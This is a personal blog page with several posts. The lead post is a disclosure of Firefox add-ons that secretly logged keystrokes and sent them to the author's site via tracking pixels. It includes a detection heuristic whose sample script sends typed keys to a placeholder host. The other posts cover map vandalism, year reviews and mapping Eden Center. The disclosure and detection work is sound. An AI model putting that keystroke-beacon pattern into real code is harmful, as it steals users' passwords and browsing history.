Minh’s Notes

Under Construction

I am working diligently to give this website a nicer look and feel and a more streamlined system for managing it. Please bear with me: I can only do this during my free time, so this effort will take a long time.

Speaking of construction, here’s a prehistoric under construction page for my now-defunct LSP Online.


In the meantime…

I spy a spy

Sunday, September 16, 2018 — Recently, I discovered that the author of several Firefox add-ons has turned some of them into spyware designed to steal passwords from unsuspecting users. This post details the classic man-in-the-browser Trojan horse attack to raise awareness about shortcomings in Firefox’s WebExtensions API and the process for approving add-ons for distribution via the Firefox Add-ons website.

A gift for Troy

A year ago, Mozilla eliminated the so-called “legacy” extension platform in favor of a new WebExtensions API largely copied from Google Chrome’s extension API. This caused my AVIM extension to become incompatible with Firefox 57 and above, inconveniencing many Vietnamese-speaking Firefox users who depended on it to browse and communicate in their native language. I remain committed to eventually rewriting AVIM as a WebExtension, but there are significant technical hurdles.

In the meantime, two developers took advantage of the void left by AVIM. One created an extension that opens their homepage, from which they served ads alongside a download link for someone else’s desktop-based IME. Another, a self-described cybersecurity practitioner who goes by “domdomrung”, ported several add-ons from Google Chrome to Firefox, including a rudimentary “Vietnamese Input Method” extension. Both authors’ extensions had a blatant SEO character, but that in itself didn’t violate Mozilla’s add-on policies on security and privacy.

Vietnamese Input Method | SafeKids
Vietnamese Input Method (left) and SafeKids (right) on the Firefox Add-ons website

In April, domdomrung published a minor update to Vietnamese Input Method that automatically went out to existing users. The previous month, domdomrung had also updated a “SafeKids” extension that ostensibly provided child monitoring functionality. Buried within both updates were five lines of malicious code that log users’ keystrokes and send them to domdomrung’s website. Specifically, the code injects a script into every webpage that logs each keystroke to local storage. Every 3.6 seconds, or whenever the user presses the Enter or Return key, if at least five characters have been typed, the script loads a tracking pixel from domdomrung’s domain, blog.mybloggertricks.org, using an Image constructor.

The putative image’s URL includes the typed characters and the current webpage’s URL. The resource at this URL is not an image but rather an HTML document that redirects to Google. Nonetheless, like any tracking pixel, merely accessing the URL is enough to populate the server logs with the payload. In this case, the payload includes a full browsing history and is very likely to include user names and passwords.

Surprise

Mozilla’s add-on policy requires every add-on to “disclose how the add-on collects, uses, stores and shares user data in the privacy policy” and “expects that the add-on limits data collection whenever possible”. Vietnamese Input Method had no privacy policy. Collecting keystrokes in this way provides no obvious user benefit. It’s impossible to know what domdomrung is doing with the data, but it isn’t difficult to imagine the data being used for nefarious purposes. (Some popular input method extensions do send keystrokes to a server but justify it as a necessary step for predictive suggestions. Such extensions do raise security and privacy concerns but are not necessarily malicious.)

SafeKids privacy policy
The SafeKids extension’s privacy policy says one thing in English to get by the review process and another thing in Vietnamese to attract downloads.

Meanwhile, SafeKids has a bilingual privacy policy that attempts to justify keylogging as a legitimate function that gives parents control over their children’s browsing behavior. Parenting questions aside, it’s worth noting that only the English portion of the privacy policy says, “I and mozilla cant not view your log” [sic]. That statement can’t not be true, given how the extension phones home with browsing histories and keystrokes. Similar language is nowhere to be found in the Vietnamese portion of the privacy policy. I suspect domdomrung used this statement to deceive Mozilla Add-ons reviewers who speak English but not Vietnamese. It worked.

A bug in SafeKids makes it possible to identify at least two victims of this extension. The add-on aggressively added the keylogging script to every HTML document, failing to distinguish ordinary webpages from HTML documents serving as rich text editors, which are popular on forums. As a result, the malicious code is present verbatim in forum posts and elsewhere. Where possible, I have notified these individuals of the need to uninstall the malicious add-ons.

In July, a Firefox user left a review complaining about Vietnamese Input Method’s keylogging behavior. However, the add-on remained available for download. On September 1st, I discovered this add-on and reported it to Mozilla, and they removed it a couple days later. However, they haven’t added it to the blocklist, so users who have installed this extension continue to suffer this breach of privacy. On September 9th, I also reported SafeKids to Mozilla. It remains available for download.

Vietnamese Input Method reviews
I wasn’t the first to notice the malicious behavior in Vietnamese Input Method.

On September 16th, I filed Bugzilla bugs 1,491,716 and 1,491,717 to add Vietnamese Input Method and SafeKids to the blocklist, which will quickly disable any existing installations. I urge Mozilla to act promptly to delete SafeKids and blocklist both add-ons.

Prevention and preemption

This incident underscores the privacy risk posed by keyboarding software and undermines Mozilla’s claim that WebExtensions is inherently more secure than the legacy add-on platform that it replaced. Granted, with WebExtensions, a security vulnerability such as AVIM’s 2009 eval() bug can’t as easily escalate into a full-blown attack on the local machine. Still, as long as an extension has access to the keyboard and the network simultaneously, it’s all too easy for an unscrupulous add-on author to steal personal information en masse. The irony isn’t lost on me that my own subsequent efforts to keep AVIM secure through sandboxing frequently drew scrutiny from reviewers, scrutiny that these add-ons clearly didn’t receive.

Mozilla should audit existing add-ons for undeclared tracking pixel usage and reimpose a human review process for add-on updates, just as there was before WebExtensions. A human review process can help ensure that add-on developers aren’t using “clean” first versions as cover for future malicious updates. As it is, WebExtensions and the Firefox Add-ons website give users a false sense of security.
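As a rough illustration of what an automated first pass of such an audit might look for, here is a minimal sketch. It assumes the auditor already has each content script as plain text, and it uses crude regular expressions rather than a real JavaScript parser. The function names, the patterns, and the `tracker.example` domain are all hypothetical; nothing here reflects how Mozilla's review tooling actually works.

```python
import re

# Hypothetical patterns. A real audit would parse the code instead of grepping it,
# since obfuscated or minified scripts would slip past regular expressions.
KEY_LISTENER = re.compile(r"""addEventListener\(\s*['"]key(?:down|up|press)['"]|\bonkey(?:down|up|press)\s*=""")
PIXEL_LOAD = re.compile(r"""new\s+Image\s*\(|createElement\(\s*['"]img['"]\s*\)""")
REMOTE_URL = re.compile(r"""['"`](?:https?:)?//[^'"`\s]+""")


def flag_suspicious(source: str) -> list[str]:
    """Return the reasons a content script deserves a closer human look."""
    reasons = []
    if KEY_LISTENER.search(source):
        reasons.append("listens for keyboard events")
    if PIXEL_LOAD.search(source) and REMOTE_URL.search(source):
        reasons.append("loads an image from a remote URL")
    return reasons


def needs_review(source: str) -> bool:
    # Keyboard access combined with a network beacon is the pairing to escalate.
    return len(flag_suspicious(source)) == 2


# A made-up script that pairs a key listener with a remote image load.
sample = """
document.addEventListener('keydown', function (e) { buffer += e.key; });
new Image().src = 'https://tracker.example/p.gif?k=' + encodeURIComponent(buffer);
"""
print(flag_suspicious(sample))
print(needs_review(sample))
```

A heuristic like this would only shortlist candidates for human reviewers. Plenty of legitimate extensions listen for keyboard shortcuts, and a determined author could hide either half of the pattern.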

Beyond additional scrutiny, WebExtensions needs a dedicated, secure input method API. Such an API would isolate input method logic in an environment that lacks access to the network or indeed the rest of the webpage. Network access for predictive input methods could require a separate privilege. Ideally, an input method API would work throughout the browser, including in the search bar, as AVIM does. The lack of this functionality is a frequent complaint among users of Google Chrome’s input method extensions, including Google Input Tools and AVIM “lite”.

There is clearly a need for browser-based input method editors, as seen in the former popularity of AVIM for Firefox and the continuing popularity of input method extensions for Chrome. As Mozilla eliminates what’s left of legacy extensions, users shouldn’t have to forgo their privacy in order to communicate in their own language. An add-on platform that facilitates legitimate extensions such as AVIM can keep malicious add-on authors from taking advantage of these users.


Big Apple, bad apples

Tuesday, September 04, 2018 — Give them an inch and they’ll take a mile. For all the good that can come of the “Edit” button on open content sites like Wikipedia and OpenStreetMap – disseminating knowledge, giving a voice to marginalized communities, facilitating humanitarian initiatives – anyone deeply involved with such projects can tell you it all just barely works. It’s a daily miracle that the projects haven’t collapsed under the weight of graffiti, spam, and outright lies. To hear it from countless educators, Wikipedia simply can’t be trusted.

On Thursday, Mapbox and its customers fell victim to very prominent vandalism in OpenStreetMap, in which the label for New York City got renamed to something juvenile and offensive. A few weeks earlier, Wikimedia Maps was also affected by the same act of vandalism, which included numerous slurs, frustrating Wikipedia administrators who felt that OpenStreetMap doesn’t have its act together. Both episodes were painful for me to witness, as a longtime proponent of collaboration between the Wikipedia and OpenStreetMap communities and, obviously, as a Mapbox employee. In the days since, there’s been quite a bit of discussion in the OpenStreetMap U.S. Slack workspace about how OpenStreetMap and the consumers of its data could better prevent or mitigate such attacks. Even someone seeking credit for the attack has joined in with suggestions for improving “security”. True to form, there have been renewed calls for Wikipedia-style article protection or Google Maps–style moderation. But either approach is a poor fit for an open project built on geographic data.

Nevv York
Is it a feature or a bug that the New York City node can be so easily modified? If not for the project’s openness, it’s unlikely that this city’s name would have been translated into so many languages and that the surrounding neighborhood would have gained so much detail.

A Wikipedia article can be protected, disabling the “Edit” button for everyone except administrators, quite effectively preventing it from being vandalized. But what would the equivalent be on OpenStreetMap? Protecting a single feature, such as the New York City node, would only invite a vandal to place an asinine node right next to it. (On Wikipedia, you can create a “Nevv York City” article full of junk, but nothing would ever link to it, so the impact would be minimal.) Protecting the area around the New York City node, meanwhile, would deprive that city’s residents of the ability to contribute local knowledge to the project. OpenStreetMap is still incomplete enough that we can’t afford to lock down any portion of the map, not least a fast-changing city full of potential contributors.

The Wikipedia community has always viewed article protection as a public admission of failure, only to be used as a last resort. Given that the project’s slogan is “an encyclopedia that anyone can edit”, why should so many important articles be permanently closed to editing? Wikipedia has tried to replace after-the-fact countervandalism with several different moderation systems. The most recent was finally adopted by the German Wikipedia but was only adopted on a limited basis on a handful of articles at the English Wikipedia. Meanwhile, countless pages remain permanently protected. To say that moderation hasn’t taken off is quite an understatement.

What’s more, instituting a peer review process for OpenStreetMap would entail more than just flipping a switch. While verifying a Wikipedia edit might entail spot-checking cited sources, OpenStreetMap prizes unpublished local knowledge, so to truly review changes and stave off hoaxes could in many cases require in-person visits. Google Maps and Foursquare, two commercial, crowdsourced mapping projects, actively recruit locals to spend all their time curating and groundtruthing, yet they still suffer from rampant vandalism. OpenStreetMap already encourages groundtruthing, but any hard requirement along those lines would either be roundly ignored or lead to the immediate death of the project.

To be sure, there’s more to countervandalism than locking things down. The vandalism that propagated to Wikimedia Maps, then Mapbox, lasted less than two hours on OpenStreetMap before the community reverted the changes and banned the vandal’s user account. Mapbox has deployed increasingly sophisticated tools, including machine learning, for automatically detecting and blocking vandalism that does make it past the OpenStreetMap community. Wikipedia has done much the same for its content to good effect, which is why its administrators found it so frustrating that vandalism would still work its way in via embedded maps.

Last week’s incident was an exception, proving the adage that an adversary only has to get lucky once. That style of vandalism would probably have been caught by Wikipedia’s extensive system of blacklists and abuse filters, which prevent vandals from even saving blatantly bad edits. But a persistent vandal – this one used JOSM, the OpenStreetMap editor so advanced I steer clear of it – will eventually find a way around any blacklist or filter. And if the goal is to reduce the amount of time that a vandal’s work remains on the site, then any solution will also have the undesired effect of helping the vandal learn new tricks faster, like a virus that evolves more rapidly in a Petri dish.

For my part, I think the OpenStreetMap ecosystem places far too much emphasis on bad actions while doing very little to identify and block bad actors. As a Wikipedia administrator for the last 15 years, I’ve seen firsthand the lengths that people will go to evade content-based countervandalism. If you do battle long enough with a persistent vandal, it’s only a matter of time before well-meaning contributors give up due to the inconvenience of avoiding benign words and any article of interest. You can maintain the project’s health much more effectively by targeting the malicious individual.

At any given time, a bewildering number of IP addresses and IP address ranges are blocked from editing either temporarily or permanently. Open proxies are blocked on sight. There are even tools for ferreting out sockpuppets and sleeper accounts and blocking them proactively, along with rigorous accountability to prevent administrators from abusing ordinary users’ privacy. OpenStreetMap needs to adopt similar antiabuse tools based on user identities if it is to have any hope against the hordes of script kiddies that now realize the map is subject to vandalism.

But more than any technical solution, the best approach I’ve found to fighting vandalism requires no software changes at all. OpenStreetMap needs to double down on building the most jaw-droppingly detailed map imaginable. At Wikipedia, articles on uncontroversial subjects suffer from less frequent vandalism as they develop from stubs into detailed articles. You’d think a more complete encyclopedia article would give the vandals more to tear apart, but in fact the opposite is true. I see this trend most clearly with articles about high schools, a favorite target of vain and profane adolescents:

High school article vandalism, September 2017–2018
This chart suggests that the most frequently vandalized Wikipedia articles about high schools are stub articles (up to around a thousand words) as opposed to more fully developed articles. Specifically, the chart counts the number of times an abuse filter was triggered within the past year, normalized by the number of page views during that time period (to account for some schools being more well-known than others). The abuse filter doesn’t track every instance of vandalism that occurs on the article; even better, it tracks edits that the wiki blocks outright, as well as those that the wiki flags for human review. I chose a time period of one year because vandalism of school articles waxes and wanes according to the school calendar.
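The normalization described in the caption can be sketched in a few lines. This is only an illustration under stated assumptions: the field names, the "per 1,000 views" scaling, and the sample numbers are all made up, and they are not the data or the method behind the chart.

```python
from dataclasses import dataclass


@dataclass
class ArticleStats:
    title: str        # hypothetical article title
    word_count: int   # article length in words
    filter_hits: int  # abuse filter triggers over the past year
    page_views: int   # page views over the same period


def hits_per_thousand_views(stats: ArticleStats) -> float:
    """Abuse filter hits normalized by readership (assumed scale: per 1,000 views)."""
    if stats.page_views == 0:
        return 0.0  # avoid dividing by zero for articles nobody viewed
    return 1000 * stats.filter_hits / stats.page_views


# Made-up numbers purely for illustration.
articles = [
    ArticleStats("Stub High School", 300, 12, 4_000),
    ArticleStats("Detailed High School", 5_000, 9, 30_000),
]
for a in articles:
    print(f"{a.title} ({a.word_count} words): {hits_per_thousand_views(a):.1f} hits per 1,000 views")
```

Dividing by page views is what keeps a well-known school with many readers from looking more vandalized than an obscure one simply because more people pass through its article.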

A school article tends to be vandalized by two groups of people: the school’s own students and those of the school’s sports rivals. I suspect the former group is far less likely to vandalize an article that represents their school surprisingly well. I’m unsure why the rival schools’ students also tend to leave the article alone, but I wonder if it’s because the article’s length and detail make it look like less of a toy to be kicked around. Maybe an article or a map needs a critical mass of credibility to stave off these acts of immaturity. If so, that’s good news for OpenStreetMap, because so many of the community’s efforts – importing building footprints, adding turn lanes and speed limits, refining the cartography of popular map renderers – are primarily about parity with user expectations and thus about building trust with the user.

OpenStreetMap would do well to ignore calls to indiscriminately lock down content or lock out good-faith contributors. Technical barriers to entry are never a sound way to grow a community-oriented project. Instead, with a modicum of well-considered, identity-based antiabuse measures, the project’s contributors can go about their business, drowning out the vandals that already make too much of their dumb luck.


Minutes from the last minutes of 2017

Sunday, December 31, 2017 — 2016 paved the way for a 2017 that took me in a couple new directions but mostly fell along the same themes.

This summer, I traveled to the Wikimania conference in Montréal to continue promoting closer ties between the Wikimedia and OpenStreetMap movements. There’s a long road ahead, but tight coordination between the projects is feeling more inevitable now than it did back in 2015.

Mapbox also sent me to State of the Map U.S. in Boulder to make the case that OpenStreetMap needs a mobile software ecosystem to stay relevant. I’m still busy crafting that OSM-powered map library for iOS. But business needs sent me on a detour building a turn-by-turn navigation library to complement it. Well, I love detours, or longcuts, as I remind myself after forgetting to make that left turn for the dozenth time. Maybe I need a smartphone after all.

Then again, I love the fact that I can be an unabashed roadgeek and get paid for it. The U.S. road system is fantastically idiosyncratic, so the state of the art in navigation software falls quite short still. My typical hobbyist obsession with route shields and the like can ultimately benefit the motoring public through better software.

When it comes to navigation, my formal job qualifications amount to riding shotgun on the hour-long bus ride home from school – lest I get motion sickness – plus navigating from the backseat during road trips, keeping one eye on the radar detector and the other on the Watchman. But if nothing else, those experiences help me counter the Calicentrism that shows up in surprising ways in this field.

Speaking of California, OpenStreetMap’s coverage of San José is really looking up these days. As I briefly mentioned in Boulder, our coverage of points of interest is beginning to rival more established sources. To prove it, I manually counted the entries of the local phone book, thereby cementing my reputation among Mapboxers as a phone geek.

Mozilla finally killed off support for the extension platform that made Firefox a household name and kept the browser relevant during all these years of Chrome hegemony. Mozilla couched it as a speed boost, but Vietnamese speakers quickly discovered my keyboarding extension, AVIM, on the casualty list. They really have no good alternative for writing in their language. Hopefully I’ll be able to revive AVIM atop Firefox’s new extension architecture (really, Chrome’s) in the new year. It’ll involve some lobbying and mucking around in Firefox internals, which is a road I didn’t anticipate taking when I took over that extension a decade ago.

Another hobby of mine succumbed to technical debt this year: the blog you’re reading. It’s hobbling along again, thanks to a last-minute upgrade. But it’s only a matter of time before I have to move it off Movable Type. It’s been a solid 15 years or so.

Time flies. I flew a bit this year too, but not enough to shake the roadgeek out of me.


Finding Wilson Boulevard

Sunday, May 21, 2017 — An overflowing bánh mì, a tray of tender bánh da lợn, a can of soybean milk: my treat after every monthly trip to the little Vietnamese grocery across town. Mekong Market was my Sunday Bible school of Vietnamese culture in a childhood as distant from Asia as one could imagine, in Cincinnati. Snacks, sauces, and canned foods defying translation lined the shelves; in the refrigerator, a variety of mystery meats wrapped in aluminum foil each bore the same place of origin: Chicago.

One Labor Day, my family made a trip up to Chicago to finally see the bustling Vietnamese community whose clearance we had happily bought for years. We made a lot of road trips back then, often just spur-of-the-moment driving through the peaceful countryside. But since we were headed five hours away to an unfamiliar city, we needed to plan ahead. As the resident map enthusiast, I was to find directions to the Vietnamese supermarket in Chicago using our new Internet connection. We’d enjoy some phở for lunch and bring back enough fresh ingredients to avoid Mekong Market for a little while.

A search for “Vietnamese markets in Chicago” on AltaVista turned up an article from The Washingtonian describing a cluster of supermarkets, phở restaurants, and bakeries on Wilson Boulevard. I pasted the street address into MapQuest, specified “Chicago” and “Illinois” to make sure I got the right “Wilson”, and printed out the directions. (As one did back in those days: in the car, we kept a radar detector where a phone or GPS unit would normally be holstered today.)

Bánh mì thịt nguội
A Vietnamese cold cuts sandwich (bánh mì thịt nguội).

Five hours later, we arrived in Chicago and crawled up and down Wilson Avenue. If a Vietnamese supermarket or two were to be found along this street, it couldn’t have fit very easily inside any of the modest townhouses that lined the street from end to end without interruption. I noticed, too, that the entire length of the street was numbered in the 8000 range, as opposed to the 6700 block on which this supermarket supposedly stood. My father pulled the car aside and called the supermarket’s phone number on his cell phone. I could understand just enough Vietnamese to make out the voice on the other end: “I’m in Northern Virginia – what in the world do you want me to do for you?”

As my father held his tongue – Grandma was in the back seat – we wandered aimlessly around that part of town until we happened to spot some Vietnamese signage. There, just a few minutes away from Wilson Avenue, were the supermarket, phở restaurant, and bakery we had been hoping for, by sheer luck.


In the years since, I moved to San José, California, home to one of the largest populations of Vietnamese Americans in the country. Bánh mì shops here are as commonplace as cafés. In fact, the only reason I ever notice them is that I also became immersed in OpenStreetMap, an online project that draws maps the way Wikipedia writes an encyclopedia. I found a niche mapping “flyover country” and made it my mission to improve coverage of communities underserved by commercial map vendors, among them ethnic enclaves in San José, Orange County, and elsewhere.

Last month, I happened to be in Washington, D.C., and, on a lark, decided to visit Wilson Boulevard for real. It had been almost eighteen years since my last attempt, but despite having since moved to a city with a large Vietnamese population and plenty of Vietnamese food, I figured seeing this street in person would give me some closure. Fortunately, the same Metro line that took me almost to the airport also took me almost to Eden Center, the Vietnamese shopping center that had teased me back in grade school.

Parking aisles
No Vietnamese shopping center would be complete without a kitschy gate.

I had always imagined Eden Center to be more of a bazaar than a strip mall. Nonetheless, it has almost everything you’d expect from a center of Vietnamese social life: a dearth of parking, a man singing karaoke to an impromptu crowd out front, a father treating his daughters to the kumquats that hang from a decorative tree nearby. On the other hand, there are no elderly men playing cờ tướng in front of the shops, as one often finds in California. (One wall bears an enormous warning against gambling and suggests area casinos as alternatives.)

Like similar centers in Orange County, Eden Center is steeped in war history. Each aisle in the parking lot bears the name of a South Vietnamese general.

Parking aisles
At the intersection of Nguyễn Khoa Nam and Trần Văn Bá “Avenues”.

The South Vietnamese flag flies proudly beside the American flag. As it was the week before the anniversary of the Fall of Saigon, a banner spanning the two flagpoles honored South Vietnamese war heroes.

South Vietnamese heroes banner
The banner reads, Thành Kính Tri Ân Anh Hùng Tử Sĩ Việt Nam Cộng Hòa Vị Quốc Vong Thân (“With Gratitude We Revere the Martyred National Heroes of the Republic of Vietnam”).

I thoroughly field-surveyed Eden Center for OpenStreetMap, noting the restaurants, jewelers, beauty salons, travel agencies, and karaoke bars tucked away in the center’s “mini-malls”. Before leaving, I bought a bánh mì, a piping hot tray of bánh da lợn, and a can of soybean milk for the road.


The whole reason I got involved with “citizen mapping” is that proprietary map sources – the ones we take for granted as being complete, accurate, and up-to-date – actually fall so short when it comes to places beyond San Francisco, beyond the central business districts, beyond the tourist traps.

Eden Center on Apple Maps
Apple Maps includes only a few shops, but they’re all in the wrong places and some are no longer open.

Eden Center on Google Maps
With the same indoor mapping style it applies to every mall, Google Maps makes it look like it has spectacular coverage of Eden Center. But it’s just walls: most of the shops are still in the wrong location and some have closed.

Eden Center on Baidu Maps
I found it surprising that Baidu Maps has coverage of this area on par with Apple Maps, but it too has misplaced and outdated points of interest.

OpenStreetMap didn’t have a lot of detail about Eden Center until I ventured there last month, but now it’s complete, accurate, and up-to-date. Even the parking aisles are named.

Eden Center on OpenStreetMap, before and after
After my visit to Eden Center, OpenStreetMap gained so much detail in the area that there isn’t enough room to display most of the points of interest with proper icons and labels. (Left: before; right: after)

Eden mini-malls on OpenStreetMap, before and after
(Top: before; bottom: after)

Eden Mini Mall on OpenStreetMap, full detail
One of OpenStreetMap’s advantages as a human-curated map database is an attention to detail. The abundant diacritical marks in Vietnamese are essential to comprehension, so this Vietnamese-American community will find it helpful that OSM includes the diacritics, even though this shopping center is located in a predominantly English-speaking city.

OpenStreetMap may have a long way to go before it can even dream of breaking people’s Google habits. But for now, I’m happy to have finally made it to Wilson Boulevard and made it easier for others to do the same – minus the detour.


Minutes from the last minutes of 2016

Saturday, December 31, 2016 — It feels wrong to leave my blog hanging on such a brief note about new employment, especially now that I no longer have to keep nearly as many secrets about what I do in front of the computer screen. A blog post authored on December 31st is all but guaranteed to be a year in review. But I’ve procrastinated on updating this blog for well over a year, so you’ll get more than you bargained for.

As my last post suggests, I’ve been preoccupied with maps all this time. Specifically, I’ve been developing an iOS Cocoa Touch library for utterly customizable maps with an incredibly creative team. It wasn’t my intention to delve into iOS development after leaving the Cupertino orchard. After all, I had only started using a smartphone a few months prior. It was only a matter of time before I gave in to temptation and ported the library to macOS. Now I have an excuse to write AppleScript!

To me, the most important feature of these map libraries is that they’re based on OpenStreetMap data. Libraries like Mapbox’s are a conduit for the OSM community’s unparalleled, mostly labor-of-love mapping to find its way into the lives of ordinary folks who don’t obsess over maps. I have a lot more to say about why OSM matters, but it would take this post far into manifesto territory, so that’ll have to wait until next year.

Last year, I got an opportunity to share ideas for nurturing the OSM community at, of all places, the United Nations headquarters in New York. It was the first time I’d ever spoken at a conference – I guess it showed. The conference scene also took me to Mexico City and San Diego, where I introduced a small sliver of the Wikimedia community to OSM and its community. The Wikimedia and OSM projects are drawing much closer together, and we’ll finally start to see some of the concrete benefits of that relationship in the new year.

AVIM, my Vietnamese input method extension for Firefox, gained some long-needed features this year, like support for multisyllabic loan words. But the future of that beautiful extension is in doubt, because Mozilla is dead-set on sunsetting the only browser extension platform that’s more than a toy. It’s a pity; the end of AVIM in Firefox will chip away at Vietnamese speakers’ ability to use their native language as a first-class citizen on the Web.

So it’s with mixed feelings that I careen into 2017, but only because 2015–16 was so swell. I’m sure you’re already looking forward to my next last-minute update in approximately one year.



Copyright © 2002–2018 Minh Nguyen.